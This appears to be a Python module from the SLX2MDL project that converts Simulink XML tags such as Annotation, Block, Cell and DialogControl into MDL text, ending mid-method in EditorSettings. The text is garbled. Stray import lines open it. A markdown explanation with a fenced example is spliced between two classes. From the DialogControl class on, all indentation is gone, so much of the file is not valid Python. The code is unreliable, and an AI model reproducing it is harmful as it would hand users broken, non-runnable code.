from . import abn
from . import django
# ---- tags_model.py (mdstepha/SLX2MDL, MIT) ----
#!/usr/bin/python3
from commons import Utils, XmlElement
class Annotation(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Annotation') and strval.endswith('</Annotation>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'Annotation' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Annotation(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Annotation {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class AnnotationDefaults(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<AnnotationDefaults') and strval.endswith('</AnnotationDefaults>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'AnnotationDefaults' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return AnnotationDefaults(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'AnnotationDefaults {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class Array(XmlElement):
    # OBSERVATION:
    # 1. <Array> contains only one type of children tag
    # 2. <Array> does not contain <P> tag (follows from observation 1)
    # 3. 'Dimension' of an array (in mdl) is its number of children
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Array') and strval.endswith('</Array>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.dimension = len(self.inner_xmls_of_type_xml)
        self.ps = []
        self.objects = []
        self.cells = []
        self.mATStructs = []
        self.arrays = []  # found in matlab-central/RC_Demo_C2000_Control_Unit
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Object':
                self.objects.append(Object.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Cell':
                self.cells.append(Cell.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'MATStruct':
                self.mATStructs.append(MATStruct.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Array':
                self.arrays.append(Array.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'Array' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Array(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Array {\n'
        for x in self.attrs:
            if x.name in ['Dimension']:
                continue
            str_ += f'{x.name} "{x.value}"\n'
        str_ += f'Dimension {self.dimension}\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.objects:
            str_ += f'{x.strmdl}\n'
        for x in self.cells:
            str_ += f'{x.strmdl}\n'
        for x in self.mATStructs:
            str_ += f'{x.strmdl}\n'
        for x in self.arrays:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_
class Block(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Block') and strval.endswith('</Block>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.ports = []
        self.masks = []
        self.systems = []
        self.lists = []
        self.functionPorts = []
        self.objects = []
        self.linkDatas = []  # found in corpus/matlab-central/Dual_Clutch_Trans.slx
        self.instanceDatas = []  # found in corpus/matlab-central/HEV_Battery_Lib.slx
        self.arrays = []  # found in corpus/github/daq2_sim.slx
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Port':
                self.ports.append(Port.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Mask':
                self.masks.append(Mask.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'System':
                self.systems.append(System.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'InstanceData':
                self.instanceDatas.append(InstanceData.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'List':
                self.lists.append(List.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'FunctionPort':
                self.functionPorts.append(FunctionPort.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Object':
                self.objects.append(Object.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'LinkData':
                self.linkDatas.append(LinkData.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Array':
                self.arrays.append(Array.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'Block' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Block(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Block {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.ports:
            str_ += f'{x.strmdl}\n'
        for x in self.masks:
            str_ += f'{x.strmdl}\n'
        for x in self.systems:
            str_ += f'{x.strmdl}\n'
        for x in self.instanceDatas:
            str_ += f'{x.strmdl}\n'
        for x in self.lists:
            str_ += f'{x.strmdl}\n'
        for x in self.functionPorts:
            str_ += f'{x.strmdl}\n'
        for x in self.objects:
            str_ += f'{x.strmdl}\n'
        for x in self.linkDatas:
            str_ += f'{x.strmdl}\n'
        for x in self.arrays:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_
class BlockDefaults(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<BlockDefaults') and strval.endswith('</BlockDefaults>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'BlockDefaults' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return BlockDefaults(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'BlockDefaults {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class BlockDiagramDefaults(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<BlockDiagramDefaults') and strval.endswith('</BlockDiagramDefaults>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.systemDefaults = []
        self.blockDefaults = []
        self.annotationDefaults = []
        self.lineDefaults = []
        self.maskDefaults = []
        self.blockParameterDefaults = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'SystemDefaults':
                self.systemDefaults.append(SystemDefaults.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'BlockDefaults':
                self.blockDefaults.append(BlockDefaults.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'AnnotationDefaults':
                self.annotationDefaults.append(AnnotationDefaults.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'LineDefaults':
                self.lineDefaults.append(LineDefaults.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'MaskDefaults':
                self.maskDefaults.append(MaskDefaults.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'BlockParameterDefaults':
                self.blockParameterDefaults.append(BlockParameterDefaults.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'BlockDiagramDefaults' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return BlockDiagramDefaults(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = ''
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.systemDefaults:
            str_ += f'{x.strmdl}\n'
        for x in self.blockDefaults:
            str_ += f'{x.strmdl}\n'
        for x in self.annotationDefaults:
            str_ += f'{x.strmdl}\n'
        for x in self.lineDefaults:
            str_ += f'{x.strmdl}\n'
        for x in self.maskDefaults:
            str_ += f'{x.strmdl}\n'
        for x in self.blockParameterDefaults:
            str_ += f'{x.strmdl}\n'
        str_ += '\n\n'
        return str_
class BlockParameterDefaults(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<BlockParameterDefaults') and strval.endswith('</BlockParameterDefaults>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.blocks = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Block':
                self.blocks.append(Block.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'BlockParameterDefaults' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return BlockParameterDefaults(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'BlockParameterDefaults {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.blocks:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class Branch(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Branch') and strval.endswith('</Branch>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.branches = []  # <Branch> can contain <Branch>
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Branch':
                self.branches.append(Branch.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'Branch' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Branch(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Branch {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.branches:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class Callback(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Callback') and strval.endswith('</Callback>')
        super().__init__(strval, parent_xml)

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Callback(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        return f'Callback "{self.content}"'


class Capabilities(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Capabilities') and strval.endswith('</Capabilities>')
        super().__init__(strval, parent_xml)

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Capabilities(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        return f'Capabilities "{self.content}"'


class Cell(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Cell') and strval.endswith('</Cell>')
        super().__init__(strval, parent_xml)

        self.class_attr = None
        for x in self.attrs:
            if x.name == 'Class':
                self.class_attr = x

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Cell(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        quoted = f'Cell "{self.content}"'
        unquoted = f'Cell {self.content}'
        boxed = f'Cell [{self.content}]'
        # as seen from corpus/matlab-central/fir_filter_example.slx:
        # if attribute 'Class' = 'double', then content is boxed
        # if attribute 'Class' = 'char', then content is quoted
        if self.class_attr and self.class_attr.value in ['double']:
            if self.content.startswith('[') and self.content.endswith(']'):
                return unquoted
            return boxed
        return quoted  # default
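The quoting rule in Cell.strmdl (boxed brackets for numeric Class='double' content unless the content is already boxed, quotes for everything else) can be captured as a standalone function for clarity. This is only an illustrative sketch: `render_cell` is a hypothetical name, not part of this module, and it takes the content and Class value directly instead of an XmlElement:

```python
def render_cell(content, class_attr):
    """Mirror the decision in Cell.strmdl: box numeric cells, quote everything else."""
    if class_attr == 'double':
        if content.startswith('[') and content.endswith(']'):
            return f'Cell {content}'      # already boxed: emit unquoted
        return f'Cell [{content}]'        # box the numeric content
    return f'Cell "{content}"'            # default: quote

# examples:
render_cell('3.14', 'double')     # -> 'Cell [3.14]'
render_cell('[1 2 3]', 'double')  # -> 'Cell [1 2 3]'
render_cell('abc', 'char')        # -> 'Cell "abc"'
```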
class ConfigSet(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<ConfigSet') and strval.endswith('</ConfigSet>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.objects = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Object':
                self.objects.append(Object.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'ConfigSet' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return ConfigSet(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Array {\n'
        str_ += 'Type "Handle"\n'
        str_ += f'Dimension {len(self.inner_xmls_of_type_xml)}\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.objects:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class ConfigurationSet(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<ConfigurationSet') and strval.endswith('</ConfigurationSet>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.objects = []
        self.arrays = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Object':
                self.objects.append(Object.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Array':
                self.arrays.append(Array.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'ConfigurationSet' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return ConfigurationSet(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = ''  # special
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.objects:
            str_ += f'{x.strmdl}\n'
        for x in self.arrays:
            str_ += f'{x.strmdl}\n'
        str_ += '\n\n'
        return str_


class ConcurrentExecutionSettings(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<ConcurrentExecutionSettings') and strval.endswith('</ConcurrentExecutionSettings>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.objects = []
        self.arrays = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Object':
                self.objects.append(Object.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'Array':
                self.arrays.append(Array.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'ConcurrentExecutionSettings' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return ConcurrentExecutionSettings(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = ''  # special
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.objects:
            str_ += f'{x.strmdl}\n'
        for x in self.arrays:
            str_ += f'{x.strmdl}\n'
        str_ += '\n\n'
        return str_


class ConfigManagerSettings(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<ConfigManagerSettings') and strval.endswith('</ConfigManagerSettings>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'ConfigManagerSettings' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return ConfigManagerSettings(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = ''  # special
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '\n\n'
        return str_
class Connector(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Connector') and strval.endswith('</Connector>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'Connector' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Connector(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'Connector {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class ControlOptions(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<ControlOptions') and strval.endswith('</ControlOptions>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'ControlOptions' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return ControlOptions(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        # special: no surrounding braces, just contents
        str_ = '\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        str_ += '\n\n'
        return str_


class CustomProperty(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<CustomProperty') and strval.endswith('</CustomProperty>')
        super().__init__(strval, parent_xml)

        innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
        self.ps = []
        self.enumStrPairss = []  # first found in corpus/github-downloaded/CSEI_u.slx
        for x in self.inner_xmls:
            if x.tag == 'P':
                self.ps.append(P.from_XmlElement(x))
                innerxml_used[x] = True
            if x.tag == 'EnumStrPairs':
                self.enumStrPairss.append(EnumStrPairs.from_XmlElement(x))
                innerxml_used[x] = True
        for ix, u in innerxml_used.items():
            if not u:
                raise Exception(f"Inner XML of 'CustomProperty' not used.\nUnused XML:\n\n{ix.strval}")

    @classmethod
    def from_XmlElement(cls, xml_element):
        return CustomProperty(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        str_ = 'CustomProperty {\n'
        for x in self.attrs:
            str_ += f'{x.name} "{x.value}"\n'
        for x in self.ps:
            str_ += f'{x.strmdl}\n'
        for x in self.enumStrPairss:
            str_ += f'{x.strmdl}\n'
        str_ += '}\n\n'
        return str_


class Description(XmlElement):
    def __init__(self, strval, parent_xml):
        strval = strval.strip()
        assert strval.startswith('<Description') and strval.endswith('</Description>')
        super().__init__(strval, parent_xml)

    @classmethod
    def from_XmlElement(cls, xml_element):
        return Description(xml_element.strval, xml_element.parent_xml)

    @property
    def strmdl(self):
        return f'Description "{self.content}"'
class DialogControl(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DialogControl') and strval.endswith('</DialogControl>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.controlOptions = []
self.prompts = []
self.dialogControls = [] # there can be nested <DialogControl> see: applications/sldemo_autotrans
self.callbacks = []
self.tooltips = []
self.filePaths = [] # first found in corpus/matlab-central/Contact_Forces_Lib.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ControlOptions':
self.controlOptions.append(ControlOptions.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Prompt':
self.prompts.append(Prompt.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Callback':
self.callbacks.append(Callback.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Tooltip':
self.tooltips.append(Tooltip.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'FilePath':
self.filePaths.append(FilePath.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DialogControl' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DialogControl(xml_element.strval, xml_element.parent_xml)
def strmdl(self, is_array_element):
"""
Args:
is_array_element (bool): True if the returned str is to be wrapped inside Array{}, else False
"""
# special
str_ = 'Object {\n'
# OBSERVATION: If multiple <DialogControl> are contained in a parent tag (eg. <Mask>),
# they are wrapped in Array{}
#
# <DialogControl> become Object {} in mdl and they contain $ObjectID, $PropName, and
# $ClassName.
#
# When they are wrapped in Array{}, in original mdl files (generated by Simulink)
# - $ PropName is moved out (becomes a MANDATORY attribute of Array and renamed to
# Propname i.e. no leading $)
# - $ClassName is NOT removed. (THIS IS DIFFERENT IN <MaskParameter>)
# - $ObjectID remains the same.
#
# Although keeping $PropName inside these wrapped Object{}s
# does not harm, we have chosen to remove it just like in the mdl file produced by Simulink.
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
str_ += f'$ClassName "{self.array_type_or_object_className()}"\n'
if not is_array_element:
str_ += f'$PropName "DialogControls"\n'
for x in self.attrs:
# 'Type' info goes to $ClassName
if x.name not in ['Type']:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.controlOptions:
str_ += f'{x.strmdl}\n'
# OBSERVATION: Some <Prompt> in <DialogControl> do not appear in the mdl file.
# For example, when <DialogControl> has Type="CheckBox", the <Prompt> contained in the
# <DialogControl> does not appear in the mdl file (see applications/aero_dap3dof).
# However, we are not yet sure exactly when <Prompt>'s transformation must be omitted
# from the mdl output, so we always include it.
# TODO: If this causes problems, investigate when <Prompt>'s transformation should and
# should not appear, and make the required changes.
for x in self.prompts:
str_ += f'{x.strmdl}\n'
if len(self.dialogControls) > 1:
str_ += 'Array {\n'
str_ += f'Type "Simulink.dialog.Control"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "DialogControls"\n'
str_ += f'Dimension {len(self.dialogControls)}\n'
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=False)}\n'
for x in self.callbacks:
str_ += f'{x.strmdl}\n'
for x in self.tooltips:
str_ += f'{x.strmdl}\n'
for x in self.filePaths:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
def array_type_or_object_className(self):
"""Return the value needed for
- Array/Type (if this DialogControl is to be wrapped in an Array), or
- Object/$ClassName (if this DialogControl is not to be wrapped in an Array).
"""
# OBSERVATION: $ClassName, whether it appears inside Object{} or directly inside Array{}
# (i.e. outside Object{}), is derived from the value of the 'Type' attr.
# OBSERVATION: $ClassName may be of the form 'Simulink.dialog.parameter.xxx' or
# 'Simulink.dialog.xxx', e.g. Type="Popup" maps to 'Simulink.dialog.parameter.Popup'
# (see applications/sldemo_autotrans, applications/aero_dap3dof).
type_ = self.attr_value_by_name('Type')  # avoid shadowing the builtin 'type'
if type_ in [
'Button',
'Group',
'Text',
'TabContainer', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Tab', # first found in corpus/github-downloaded/adi_ad961_models.slx
'CollapsiblePanel', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Control', # first found in corpus/github-downloaded/adi_ad961_models.slx
'Panel', # first found in corpus/github/Lib_Turbo_CompressorVG_TMATS.slx
'Image', # first found in corpus/github/matlab/Contact_Forces_Lib
]:
return f'Simulink.dialog.{type_}'
elif type_ in [
'CheckBox',
'Edit',
'Slider',
'Spinbox',
'Popup', # first found in corpus/github-downloaded/adi_ad961_models.slx
'RadioButton', # first found in corpus/matlab-central/ACTimeOvercurrentRelayBlock
]:
return f'Simulink.dialog.parameter.{type_}'
else:
raise Exception(f"Unknown 'Type' attribute '{type_}' in <DialogControl>")
class DiagnosticSuppressor(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DiagnosticSuppressor') and strval.endswith('</DiagnosticSuppressor>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DiagnosticSuppressor' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DiagnosticSuppressor(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class DialogParameters(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<DialogParameters') and strval.endswith('</DialogParameters>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'DialogParameters' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return DialogParameters(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'DialogParameters {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Display(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Display') and strval.endswith('</Display>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Display' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Display(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += f'Display "{self.content}"' # special
str_ += '\n\n'
return str_
class EditorSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EditorSettings') and strval.endswith('</EditorSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EditorSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
